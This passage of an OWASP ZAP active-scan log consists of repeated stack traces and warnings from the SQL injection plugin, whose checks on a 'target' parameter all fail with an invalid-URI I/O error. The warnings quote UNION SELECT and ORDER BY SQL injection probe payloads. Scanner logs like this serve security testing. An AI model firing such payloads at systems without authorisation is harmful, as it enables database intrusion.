org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685540 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685542 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685543 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685544 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685545 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685547 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685548 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685549 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685550 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685552 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685553 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' ORDER BY 5598-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685555 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685557 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685559 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685561 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685562 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for 